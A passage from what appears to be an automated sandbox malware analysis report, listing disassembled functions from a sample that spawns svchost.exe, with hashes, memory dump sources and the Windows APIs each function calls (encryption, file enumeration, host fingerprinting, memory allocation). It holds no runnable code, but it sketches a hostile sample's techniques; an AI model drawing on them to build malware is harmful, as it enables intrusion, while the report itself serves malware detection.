Instruction Fuzzy Hash: D581B971A18B1D8FC768EF1C9881676B3E1FF99310F55422EE48EC3241EA24E952C7C6

Uniqueness

Uniqueness Score: -1.00%

Function 00071270, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5563ca0edd10a65867c127509cc7d31771fbe6485017faf343d4edc26a7970f
Instruction ID: 8dcdfb7a9616d4dfe7dc98a26f79e21baa73e4247ca5b7232220f6cf50274046
Opcode Fuzzy Hash: c5563ca0edd10a65867c127509cc7d31771fbe6485017faf343d4edc26a7970f
Instruction Fuzzy Hash: 5261A93070CB084FD768EB2D94557FAB3D2FB85300F50861EE48FC3192EE68D946868A

Uniqueness

Uniqueness Score: -1.00%

Function 000727E0, Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5de8a471fb38fc3774644abba8d83a67f89eb4f0943e814748926cc979d928ae
Instruction ID: 157566d102a46f66a1644267140c59cde08315349a6ceab0720cf6be191a15bf
Opcode Fuzzy Hash: 5de8a471fb38fc3774644abba8d83a67f89eb4f0943e814748926cc979d928ae
Instruction Fuzzy Hash: 4D716C31A18B854BD3A9DB2884583BBB7D2EFD5304F58C67DD489C7251EA3984468386

Uniqueness

Uniqueness Score: -1.00%

Function 000754B0, Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8604275670960a326edacfbcbffd4a64a0ffc41937c68ebd3598ede99fd6951a
Instruction ID: 26ab876802081ba4028e24878d8ba550dc917e584c0fbf5542bf6edd68ba5dc9
Opcode Fuzzy Hash: 8604275670960a326edacfbcbffd4a64a0ffc41937c68ebd3598ede99fd6951a
Instruction Fuzzy Hash: 5B519B21B14E090B96D8BB6D58567FE72C3FBD9311F94816DE44EC3343DE999C42428A

Uniqueness

Uniqueness Score: -1.00%

Function 0006E760, Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0d4803a19cd901d38eae9b4ebb4f676a1789cd731bdcdf3d934485546354dbb0
Instruction ID: dc537e4e3c2dd5b86941253c17ae9915228f926860a01d16895abcf9e82127ea
Opcode Fuzzy Hash: 0d4803a19cd901d38eae9b4ebb4f676a1789cd731bdcdf3d934485546354dbb0
Instruction Fuzzy Hash: A1718E34618B198FDB94EF28C484B6AB7E2FF99300F5545ADE44EC7265DB35D840CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00066660, Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 050ba972960c329b6edc11ce0ff71cede697f125c40aa4b2eb49007dd572cedd
Instruction ID: 62f2684a0667d11cab69a04b168ef2deea207f1a9aade7e8324de9f271675d57
Opcode Fuzzy Hash: 050ba972960c329b6edc11ce0ff71cede697f125c40aa4b2eb49007dd572cedd
Instruction Fuzzy Hash: FF51223061CE194FD7A8EB68D896B7BB3D3FBD9314F5402ADE44AC3152DE26DC418282

Uniqueness

Uniqueness Score: -1.00%

Function 000756E0, Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73a5463a871d9c8d0946f4e19822df0724a626e122a380aeefe2363a76536164
Instruction ID: 6f6588557511891e5b8874a4d943a5eadc510160afe4cb5140a66b8ac2bbce65
Opcode Fuzzy Hash: 73a5463a871d9c8d0946f4e19822df0724a626e122a380aeefe2363a76536164
Instruction Fuzzy Hash: BB613730A18F494FE399A73C88447F673C2FB99325F54876DE46EC32E2DE689841C256

Uniqueness

Uniqueness Score: -1.00%

Function 00068CD0, Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c0c91b71235fef11449f00aa5d2252ebd560198b569d85c3687e1ea82b320e
Instruction ID: 5a2009785cba66c241553d4f3f99f6f826d2754cea87cd66d804fecf9e1d084e
Opcode Fuzzy Hash: 07c0c91b71235fef11449f00aa5d2252ebd560198b569d85c3687e1ea82b320e
Instruction Fuzzy Hash: B551B33160CA184FD7A8EB58D895A7A73D7FBD8320F44826DE48EC3251DE35DD428781

Uniqueness

Uniqueness Score: -1.00%

Function 000737D0, Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c4ae6fddfd9477b97fc9caa77276af1389963328db80797428ab1133e710fd3
Instruction ID: 15b4454200e4507e44da8236ff97085274fc48a7feebb141ac626038b51ccd3d
Opcode Fuzzy Hash: 9c4ae6fddfd9477b97fc9caa77276af1389963328db80797428ab1133e710fd3
Instruction Fuzzy Hash: 0651591596D7D149E32E623C14952F6EFC1CBAB30CF1C566DE9CED3243C41A860B938A

Uniqueness

Uniqueness Score: -1.00%

Function 00072FD0, Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb553d2b423d0cd45c482e1276e3410d41e0ea3d677329466a40b718507e2b65
Instruction ID: a305098f5c07ec1771b549b8d6f64dff9105432e2f005ce3e625d87839bf5cb7
Opcode Fuzzy Hash: bb553d2b423d0cd45c482e1276e3410d41e0ea3d677329466a40b718507e2b65
Instruction Fuzzy Hash: FE51361196D6D109E32A623C04952F7AFC5DBAF708F295AADD8CFC3243C40E890B9386

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 231824723.exe PID: 3040 Parent PID: 3388 231824723.exeCOMMON

Execution Graph

Execution Coverage:	41.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	5.3%
Total number of Nodes:	57
Total number of Limit Nodes:	5

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0050E8BB, Relevance: 9.0, APIs: 6, Instructions: 37
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32 ref: 0050E8BD
CommandLineToArgvW.SHELL32(00000000,0050EFEC), ref: 0050E8C9
GetStartupInfoW.KERNEL32(0050EFF4), ref: 0050E8F6
Sleep.KERNELBASE(000003E8,0000000C,00000017,00000032), ref: 0050E923
Sleep.KERNEL32(000084D0,0000000C,00000017,00000032), ref: 0050E937
ExitProcess.KERNEL32 ref: 0050E93F

Memory Dump Source

Source File: 00000014.00000002.55429165404.00000000004E1000.00000040.00000001.sdmp, Offset: 004E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_4e1000_231824723.jbxd

Similarity

API ID: CommandLineSleep$ArgvExitInfoProcessStartup
String ID:
API String ID: 2884962887-0
Opcode ID: 6528c5dafd71fdf0e6fb8cf0df8330195f2e676d66e13d667835b7aa2d236368
Instruction ID: 13d91f26faaa71bc9b6013560c9e11a311218d19af79ab307ba5b4e9902f0d6a
Opcode Fuzzy Hash: 6528c5dafd71fdf0e6fb8cf0df8330195f2e676d66e13d667835b7aa2d236368
Instruction Fuzzy Hash: 6701A431584381ABE7207FB1DC1FB1D3BE4BF24B45F154C29F646860E2DBB444089B16

Uniqueness

Uniqueness Score: -1.00%

Function 00440000, Relevance: 9.0, Strings: 7, Instructions: 249
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tEncrypt, xrefs: 004402EB, 004402EE
CryptHashData, xrefs: 00440230, 00440233
rypt, xrefs: 004402EF, 004402F2
CryptEncrypt, xrefs: 0044026E, 00440271
CryptAcquireContextA, xrefs: 004401F2, 004401F5
CryptCreateHash, xrefs: 00440211, 00440214
CryptDeriveKey, xrefs: 0044024F, 00440252

Memory Dump Source

Source File: 00000014.00000002.55429094473.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_440000_231824723.jbxd

Similarity

API ID:
String ID: CryptAcquireContextA$CryptCreateHash$CryptDeriveKey$CryptEncrypt$CryptHashData$rypt$tEncrypt
API String ID: 0-299839648
Opcode ID: 28ff45b24469f5f2112780e45f7afa2a5872612da5b2b81f99d34a07dca220fd
Instruction ID: daf62635408c4573c8c58d7d7d1e0cdbe4f00b8c393e7fbb24569911114a876f
Opcode Fuzzy Hash: 28ff45b24469f5f2112780e45f7afa2a5872612da5b2b81f99d34a07dca220fd
Instruction Fuzzy Hash: C4C15E60D082C8D9FB11C7E4D8097DEBFB55F22748F084098E6487B282D7FE5A58C766

Uniqueness

Uniqueness Score: -1.00%

Function 0045002D, Relevance: 4.9, APIs: 3, Instructions: 392
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,00450005), ref: 004500EB
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00450005), ref: 00450113

Memory Dump Source

Source File: 00000014.00000002.55429102101.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_450000_231824723.jbxd

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID:
API String ID: 2032221330-0
Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
Instruction ID: fda3dbb818db7d1317a56fd3dc4c9c2457370733d50cb557025f488310761e1b
Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
Instruction Fuzzy Hash: ABE1B1796047068FDB24CF19C84472AB3E0BF9470AF18456EEC859B342E778EC49CB95

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00440350, Relevance: 1.3, Strings: 1, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CryptAcquireContextA, xrefs: 00440353

Memory Dump Source

Source File: 00000014.00000002.55429094473.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_440000_231824723.jbxd

Similarity

API ID:
String ID: CryptAcquireContextA
API String ID: 0-2822909605
Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595

Uniqueness

Uniqueness Score: -1.00%

Function 00450467, Relevance: .1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.55429102101.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_450000_231824723.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
Instruction ID: 1bff76071a6572584637bf114e6555579230328fec6497dd95b319aef83332dd
Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
Instruction Fuzzy Hash: 6931D53A60474A8FC710DF18D480A2AB7E4FF89305F4509AEE99587313E338F90A8B95

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exe PID: 3940 Parent PID: 3040 svchost.exeCOMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22.9%
Total number of Nodes:	327
Total number of Limit Nodes:	15

Executed Functions

Function 00061180, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 314
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 00061242
FindNextFileW.KERNELBASE ref: 000614B1
FindClose.KERNELBASE ref: 000614C2

Strings

., xrefs: 000612EB
ductVersion, xrefs: 0006128E

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID: .$ductVersion
API String ID: 3541575487-227499276
Opcode ID: c1a82bc0d426269996b66f5f4b1a65c3672b1bae3bf7f1d75180920cafb46292
Instruction ID: 1294b7351c403f64f1c4598a0608ea69b3fcebc94e3f026d69048bb43f88400f
Opcode Fuzzy Hash: c1a82bc0d426269996b66f5f4b1a65c3672b1bae3bf7f1d75180920cafb46292
Instruction Fuzzy Hash: 6E913931A1CB1C8AEB75AB15D4487FA72E3FFD0310F59816EC44AD72B1EE7989868341

Uniqueness

Uniqueness Score: -1.00%

Function 0006B160, Relevance: 5.2, APIs: 3, Instructions: 707
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAddVectoredExceptionHandler.NTDLL ref: 0006B206
SetCurrentDirectoryW.KERNELBASE ref: 0006B25B
RtlExitUserProcess.NTDLL ref: 0006BA53

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID: CurrentDirectoryExceptionExitHandlerProcessUserVectored
String ID:
API String ID: 1612252912-0
Opcode ID: 9c553e9492940460de751763cb6ccfa4d075d6d442f24a204fb49aa30d034741
Instruction ID: 9a466b669d77621987ddc4319c0355e7d5d294ab7414c70bb440996955d1a11f
Opcode Fuzzy Hash: 9c553e9492940460de751763cb6ccfa4d075d6d442f24a204fb49aa30d034741
Instruction Fuzzy Hash: 40323770618E19CFE794EB28DC957A973E2FBD4301F508529E44AC72A2DF78D881CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0007C2F0, Relevance: 1.7, APIs: 1, Instructions: 178
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32 ref: 0007C332

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID: AcquireContextCrypt
String ID:
API String ID: 3951991833-0
Opcode ID: 9a0ffa18968c7150c23cf6e2ff002537f1bc1f435cdb5d6a3ac2367191e00ed8
Instruction ID: 288ef4b2f4ddbd9cb6a20649237a82ffbe75e812543e8cbe20c296b76ef82c47
Opcode Fuzzy Hash: 9a0ffa18968c7150c23cf6e2ff002537f1bc1f435cdb5d6a3ac2367191e00ed8
Instruction Fuzzy Hash: 9F51717161CB084FEBA8DF2CD854B6ABBE5FB99701F04856EA44EC3251DB38D8418B85

Uniqueness

Uniqueness Score: -1.00%

Function 00067AE0, Relevance: 1.6, APIs: 1, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetAdaptersInfo.IPHLPAPI ref: 00067B49

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID: AdaptersInfo
String ID:
API String ID: 3177971545-0
Opcode ID: 6ecea40a29f12a1e050033e6a58e961541c8d61ee6ea405a2a50789c507f6fa5
Instruction ID: 959dc4072c0e160d727f3fc7be84a8c6477d3b712d237fd99f3abd9d7519d0f2
Opcode Fuzzy Hash: 6ecea40a29f12a1e050033e6a58e961541c8d61ee6ea405a2a50789c507f6fa5
Instruction Fuzzy Hash: 5241E93021CA094FE798EB69D8A5BAAB7D2FBD4314F84456DF44EC3252DF78D8068381

Uniqueness

Uniqueness Score: -1.00%

Function 00065980, Relevance: 1.6, APIs: 1, Instructions: 131
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32 ref: 000659BD

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID: AcquireContextCrypt
String ID:
API String ID: 3951991833-0
Opcode ID: 001d2823ce61e18813915d268eef4c6b38eb84a64a035f695c51d128be18e979
Instruction ID: 4adb7f2a2f5e799370ed9747ef61abfa247ce5f89b80b150c2fe2ec7a8682c90
Opcode Fuzzy Hash: 001d2823ce61e18813915d268eef4c6b38eb84a64a035f695c51d128be18e979
Instruction Fuzzy Hash: 81413D3120DB058FE794DF69D894B6BB7E6EBD9351F40462DA48AC3250DF34D841CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00071510, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 0007154E
SetFilePointer.KERNELBASE ref: 00071571
SetFilePointer.KERNELBASE ref: 00071589
ReadFile.KERNELBASE ref: 000715C1
CloseHandle.KERNELBASE ref: 000715CE

Strings

ductVersion, xrefs: 00071511, 00071512

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID: File$Pointer$CloseCreateHandleRead
String ID: ductVersion
API String ID: 1230621078-1003687328
Opcode ID: 4daf13318535f406ffae20052231833df1801ddf36228ad1169f17ff062e561b
Instruction ID: 5d8f9183a53cd1bf83b8883aa3c75dbb9d8e62305a756510244e8b07b2324302
Opcode Fuzzy Hash: 4daf13318535f406ffae20052231833df1801ddf36228ad1169f17ff062e561b
Instruction Fuzzy Hash: 7421BF30718A184FE798AB3C98587AAB6D6EBC9355F50862DB49BC2291DE78C8068345

Uniqueness

Uniqueness Score: -1.00%

Function 0007BAB0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0007BC6B

Strings

, xrefs: 0007BBF3

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-3916222277
Opcode ID: f38d66de1ade1a3733b19daa7a0d5a1c248ecde829f798f4aedf01655f3e2d7e
Instruction ID: d309002da247262d054dd665ee40910f414ed7f507465b2d73e3bae881d179a7
Opcode Fuzzy Hash: f38d66de1ade1a3733b19daa7a0d5a1c248ecde829f798f4aedf01655f3e2d7e
Instruction Fuzzy Hash: F661493191CB484FE765BB2898593FAB7C1EBE5310F14853ED4CEC3242DF6898428786

Uniqueness

Uniqueness Score: -1.00%

Function 0007DBE0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationW.KERNELBASE ref: 0007DC6C

Strings

C, xrefs: 0007DC26

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID: InformationVolume
String ID: C
API String ID: 2039140958-1037565863
Opcode ID: 1b854539d4af56b1113ef8b2858a64c3c01847ea5a88b83bda8fff6e0ab215ca
Instruction ID: 9f5774c242b9231bad424c0a46e210f31918c341fe13f3d54a5fd73ad7bcc92d
Opcode Fuzzy Hash: 1b854539d4af56b1113ef8b2858a64c3c01847ea5a88b83bda8fff6e0ab215ca
Instruction Fuzzy Hash: 0431D331A28B548BD3559F28D84476BBBE1FFC9304F40892FF089C3251DB799906C796

Uniqueness

Uniqueness Score: -1.00%

Function 000678E0, Relevance: 3.2, APIs: 2, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameW.KERNEL32 ref: 00067942
SleepEx.KERNEL32 ref: 00067A59

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID: ComputerNameSleep
String ID:
API String ID: 3354815184-0
Opcode ID: f7e7a9c4b891bd0cc6f49430622fb2bec7a89d7128c424c3609301cf144bbfc4
Instruction ID: b184a4fd34ebffca596c98160ee10878eef412b33778c35ed16906ca0b05a08e
Opcode Fuzzy Hash: f7e7a9c4b891bd0cc6f49430622fb2bec7a89d7128c424c3609301cf144bbfc4
Instruction Fuzzy Hash: 1C51183161CA088FE758AB58D8997BA77D2FBD8314F94452EE44FC3251EA39C842C683

Uniqueness

Uniqueness Score: -1.00%

Function 0006F350, Relevance: 3.1, APIs: 2, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.ADVAPI32 ref: 0006F3C7
CloseHandle.KERNELBASE ref: 0006F43E

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID: CloseHandleInformationToken
String ID:
API String ID: 3954737543-0
Opcode ID: f4c4a24a6acb22cc79ab02c2aae436beb7db27dc25f77a0530e29888f41f09bb
Instruction ID: 97430a39d16fdbbb282d50c8e88614045843972dfa7a14d0073073fec81ce454
Opcode Fuzzy Hash: f4c4a24a6acb22cc79ab02c2aae436beb7db27dc25f77a0530e29888f41f09bb
Instruction Fuzzy Hash: 2721FD34618B598FE764DF29E4447ABBBE5FB98741F10462EF886C3260DB34C944CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00067010, Relevance: 3.1, APIs: 2, Instructions: 83
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0006705F
CreateMutexW.KERNELBASE ref: 000670AF

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID: DescriptorSecurity$ConvertCreateMutexString
String ID:
API String ID: 3336917037-0
Opcode ID: 14c3518b886acbfd2991b146d9ce1ec4c607f828dd3c396cbfe0ee3b2a544e13
Instruction ID: 07a72832242c7a6f428e551ff0edd60cd917f5c867511038cdcac0a487b80006
Opcode Fuzzy Hash: 14c3518b886acbfd2991b146d9ce1ec4c607f828dd3c396cbfe0ee3b2a544e13
Instruction Fuzzy Hash: 78218430219A498FEB94EF28D4587AB77E2FB98304F50492EA08ED3290CB78C9448752

Uniqueness

Uniqueness Score: -1.00%

Function 00063370, Relevance: 1.6, APIs: 1, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32 ref: 000633A2

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: ca82d3d9c14972560b7d2655baf75877226bc45e31ad0c4a04ddc5515451c50d
Instruction ID: 6a8438ce2173b2e786cedbd7a9623c2542bfc1c8a9a5b570411d7007789b9f55
Opcode Fuzzy Hash: ca82d3d9c14972560b7d2655baf75877226bc45e31ad0c4a04ddc5515451c50d
Instruction Fuzzy Hash: 29418530618A488BD7B6D718C4453EEB6E3FBD9300F90492AD04FC3295DE389A82C7C2

Uniqueness

Uniqueness Score: -1.00%

Function 000636E0, Relevance: 1.5, APIs: 1, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 00063726

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 668831bf338e9b978b8d5918e0ae40d9aec3b60f7226a413d2b69bfc9d439fb3
Instruction ID: b76d50d95af6a5daaeeb4f254d9fff0cc303d311fd1f9c3c39af30a42e6987fc
Opcode Fuzzy Hash: 668831bf338e9b978b8d5918e0ae40d9aec3b60f7226a413d2b69bfc9d439fb3
Instruction Fuzzy Hash: BCF096B150C6144FD768EF34E80AA53B6F1FB48318F15C49ED40AC7260E734CB8586C1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000649E0, Relevance: 2.8, Strings: 2, Instructions: 260COMMON

Download Yara Rule

Strings

[, xrefs: 00064ABB
], xrefs: 00064AD6

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID: [$]
API String ID: 0-2073744556
Opcode ID: 32013062bf322c0ce285ed94c89732c6d9ad4da32383d9f36405c89868e34f70
Instruction ID: c68d3958994b894530a58909fa5eca89f640e855824d1d2b109840020ccacbe4
Opcode Fuzzy Hash: 32013062bf322c0ce285ed94c89732c6d9ad4da32383d9f36405c89868e34f70
Instruction Fuzzy Hash: 5C71F331718B044BD368EF69D89577BB2D7EBC8304F50453DE48AC7292EE70EC068686

Uniqueness

Uniqueness Score: -1.00%

Function 00061B50, Relevance: 2.2, Strings: 1, Instructions: 905COMMON

Download Yara Rule

Strings

@, xrefs: 00061EFE

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: de0696105b094319040806d3ff1b7dfb71a5ef31f6b78aaa138008fed55cd911
Instruction ID: e7bb6df4ab1262c3a2725ff1bb5da8dc3a6ed93e755067277b958428cfc27be8
Opcode Fuzzy Hash: de0696105b094319040806d3ff1b7dfb71a5ef31f6b78aaa138008fed55cd911
Instruction Fuzzy Hash: 85621D30618B498FDBA4DF28C4557EAB7E2FB98310F54892DD48EC3255DB74E981CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0007AB10, Relevance: 1.8, Strings: 1, Instructions: 572COMMON

Download Yara Rule

Strings

D, xrefs: 0007AD3B

Memory Dump Source

Source File: 00000015.00000002.55453767522.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_60000_svchost.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: 3f4eaa510aaf52309da5086d0309ace68d040d6ff477565e220176dfbfa8b966
Instruction ID: 92521d6f8d819a317dbb5b25cc6908a813fecb2e1dc5aa14db22354cede5db0b
Opcode Fuzzy Hash: 3f4eaa510aaf52309da5086d0309ace68d040d6ff477565e220176dfbfa8b966
Instruction Fuzzy Hash: 7EF18330B18E0D8FDB98EF68C455A6977D2FBD9300B54856DE40EC7262DF38E8418B96

Uniqueness

Uniqueness Score: -1.00%

Function 000768F0, Relevance: 1.8, Strings: 1, Instructions: 555COMMON

